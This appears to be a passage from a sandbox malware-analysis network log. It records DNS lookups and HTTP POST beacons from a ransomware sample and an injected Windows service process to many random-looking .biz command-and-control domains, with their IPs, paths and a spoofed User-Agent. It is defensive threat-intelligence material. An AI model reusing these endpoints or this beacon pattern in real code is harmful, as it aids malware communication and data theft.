Set-Cookie: btst=bac15efeecfe1ebbfbed039faf22f9e5|191.101.209.39|1717923888|1717923888|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

tnevuluw.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

tnevuluw.biz

IN A

Response

tnevuluw.biz

IN A

35.164.78.200
DNS

tnevuluw.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

tnevuluw.biz

IN A

Response

tnevuluw.biz

IN A

35.164.78.200
POST

http://tnevuluw.biz/yilsagvrjchdbotq

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

35.164.78.200:80

Request

POST /yilsagvrjchdbotq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tnevuluw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=55a300093c24a105587a48575e5bc825|191.101.209.39|1717923889|1717923889|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

whjovd.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

whjovd.biz

IN A

Response

whjovd.biz

IN A

18.141.10.107
DNS

whjovd.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

whjovd.biz

IN A

Response

whjovd.biz

IN A

18.141.10.107
DNS

zgapiej.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

zgapiej.biz

IN A

Response

zgapiej.biz

IN A

18.208.156.248
DNS

zgapiej.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

zgapiej.biz

IN A

Response

zgapiej.biz

IN A

18.208.156.248
POST

http://whjovd.biz/piwlsftkhciin

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /piwlsftkhciin HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: whjovd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b2b497ab64dc3b83a117ef05a25daa05|191.101.209.39|1717923890|1717923890|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://zgapiej.biz/lq

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.208.156.248:80

Request

POST /lq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zgapiej.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7269f151d8088dd6897a4f5c3f191720|191.101.209.39|1717923889|1717923889|0|1|0; path=/; domain=.zgapiej.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jifai.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

jifai.biz

IN A

Response

jifai.biz

IN A

44.221.84.105
POST

http://jifai.biz/fqfevknjdmjh

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.221.84.105:80

Request

POST /fqfevknjdmjh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jifai.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a95a4aa68a24c7dc23e8237047904333|191.101.209.39|1717923889|1717923889|0|1|0; path=/; domain=.jifai.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xnxvnn.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

xnxvnn.biz

IN A

Response

xnxvnn.biz

IN A

107.178.223.183

xnxvnn.biz

IN A

104.155.138.21
POST

http://xnxvnn.biz/snh

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

107.178.223.183:80

Request

POST /snh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xnxvnn.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Content-Length: 0
DNS

ihcnogskt.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

ihcnogskt.biz

IN A

Response

ihcnogskt.biz

IN A

35.164.78.200
POST

http://ihcnogskt.biz/fitew

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

35.164.78.200:80

Request

POST /fitew HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ihcnogskt.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=441f2b413d549e522227789c0a8937e1|191.101.209.39|1717923890|1717923890|0|1|0; path=/; domain=.ihcnogskt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gjogvvpsf.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gjogvvpsf.biz

IN A

Response

gjogvvpsf.biz

IN A

208.100.26.245
DNS

kkqypycm.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

kkqypycm.biz

IN A

Response

kkqypycm.biz

IN A

18.141.10.107
POST

http://kkqypycm.biz/lpdabysfoouotoef

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.141.10.107:80

Request

POST /lpdabysfoouotoef HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: kkqypycm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f78582a07ecfbe19af33974fd594044f|191.101.209.39|1717923891|1717923891|0|1|0; path=/; domain=.kkqypycm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

reczwga.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

reczwga.biz

IN A

Response

reczwga.biz

IN A

3.237.86.197
POST

http://reczwga.biz/ek

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

3.237.86.197:80

Request

POST /ek HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: reczwga.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a45c49837151aff5b185204b3c3b5355|191.101.209.39|1717923890|1717923890|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

bghjpy.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

bghjpy.biz

IN A

Response

bghjpy.biz

IN A

34.211.97.45
DNS

bghjpy.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

bghjpy.biz

IN A

Response

bghjpy.biz

IN A

34.211.97.45
POST

http://bghjpy.biz/jerkgcqqbarnt

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

34.211.97.45:80

Request

POST /jerkgcqqbarnt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bghjpy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f45d2208d7662ea6ec36aadd45aec9a4|191.101.209.39|1717923891|1717923891|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

damcprvgv.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

damcprvgv.biz

IN A

Response

damcprvgv.biz

IN A

54.80.154.23
POST

http://damcprvgv.biz/qvyki

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.80.154.23:80

Request

POST /qvyki HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: damcprvgv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4e19c22a3633d770e84d4a862c0e9145|191.101.209.39|1717923891|1717923891|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ocsvqjg.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ocsvqjg.biz

IN A

Response

ocsvqjg.biz

IN A

3.254.94.185
POST

http://ocsvqjg.biz/kopnkrrvslxpxxl

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

3.254.94.185:80

Request

POST /kopnkrrvslxpxxl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ocsvqjg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c3dbba616d67aa08584bf112511de8bd|191.101.209.39|1717923891|1717923891|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uevrpr.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

uevrpr.biz

IN A

Response

uevrpr.biz

IN A

44.213.104.86
POST

http://uevrpr.biz/qqqgar

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.213.104.86:80

Request

POST /qqqgar HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uevrpr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c632dc1ee1b9ce4d75a6296b82f3e54e|191.101.209.39|1717923891|1717923891|0|1|0; path=/; domain=.uevrpr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ywffr.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ywffr.biz

IN A

Response

ywffr.biz

IN A

54.244.188.177
POST

http://ywffr.biz/jlnqudg

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /jlnqudg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ywffr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0d40a2c71c92cd8c51c459cb1bd2cc52|191.101.209.39|1717923892|1717923892|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

fgajqjyhr.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

fgajqjyhr.biz

IN A

Response

fgajqjyhr.biz

IN A

34.211.97.45
POST

http://fgajqjyhr.biz/kjhddwmawdkrlvhw

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.211.97.45:80

Request

POST /kjhddwmawdkrlvhw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fgajqjyhr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f5b5ff0c761423b8b2c0c5d5494bde6c|191.101.209.39|1717923892|1717923892|0|1|0; path=/; domain=.fgajqjyhr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ecxbwt.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ecxbwt.biz

IN A

Response

ecxbwt.biz

IN A

54.244.188.177
POST

http://ecxbwt.biz/yhmgpoc

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /yhmgpoc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ecxbwt.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d5aa64b7e318747d49f3e3e6375599f5|191.101.209.39|1717923892|1717923892|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

hagujcj.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

hagujcj.biz

IN A

Response

hagujcj.biz

IN A

18.208.156.248
DNS

hagujcj.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

hagujcj.biz

IN A

Response

hagujcj.biz

IN A

18.208.156.248
POST

http://hagujcj.biz/uqldvvksuulw

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.208.156.248:80

Request

POST /uqldvvksuulw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hagujcj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f63ca0284466b3c6d7783b99847e8562|191.101.209.39|1717923892|1717923892|0|1|0; path=/; domain=.hagujcj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

sctmku.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

sctmku.biz

IN A

Response

sctmku.biz

IN A

35.164.78.200
POST

http://sctmku.biz/pug

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

35.164.78.200:80

Request

POST /pug HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sctmku.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b58499f46b1f082193692c7a793dbbc7|191.101.209.39|1717923892|1717923892|0|1|0; path=/; domain=.sctmku.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pectx.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

pectx.biz

IN A

Response

pectx.biz

IN A

44.213.104.86
POST

http://pectx.biz/habgqysxqvqaivx

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.213.104.86:80

Request

POST /habgqysxqvqaivx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pectx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5d0915eace4bbb183b79c6c279eb4152|191.101.209.39|1717923892|1717923892|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zyiexezl.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zyiexezl.biz

IN A

Response

zyiexezl.biz

IN A

54.80.154.23
POST

http://zyiexezl.biz/aarjmedjtq

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.80.154.23:80

Request

POST /aarjmedjtq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zyiexezl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cc9243e53f91e9a4f3f2afb394473bc6|191.101.209.39|1717923892|1717923892|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cwyfknmwh.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

cwyfknmwh.biz

IN A

Response
DNS

qcrsp.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

qcrsp.biz

IN A

Response

qcrsp.biz

IN A

34.211.97.45
DNS

qcrsp.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

qcrsp.biz

IN A

Response

qcrsp.biz

IN A

34.211.97.45
POST

http://qcrsp.biz/rjhu

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.211.97.45:80

Request

POST /rjhu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qcrsp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c49cf985e6100a7ef53b59325076e79c|191.101.209.39|1717923893|1717923893|0|1|0; path=/; domain=.qcrsp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

banwyw.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

banwyw.biz

IN A

Response

banwyw.biz

IN A

3.237.86.197
POST

http://banwyw.biz/a

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

3.237.86.197:80

Request

POST /a HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: banwyw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6625722302df0217eb0ebf8cac382dc4|191.101.209.39|1717923893|1717923893|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

muapr.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

muapr.biz

IN A

Response
DNS

muapr.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

muapr.biz

IN A

Response
DNS

wxgzshna.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

wxgzshna.biz

IN A

Response
DNS

zrlssa.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zrlssa.biz

IN A

Response

zrlssa.biz

IN A

3.237.86.197
POST

http://zrlssa.biz/br

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

3.237.86.197:80

Request

POST /br HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zrlssa.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0010a3dc7a0343d21afa20f5a07a1927|191.101.209.39|1717923893|1717923893|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

sewlqwcd.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

sewlqwcd.biz

IN A

Response

sewlqwcd.biz

IN A

3.237.86.197
POST
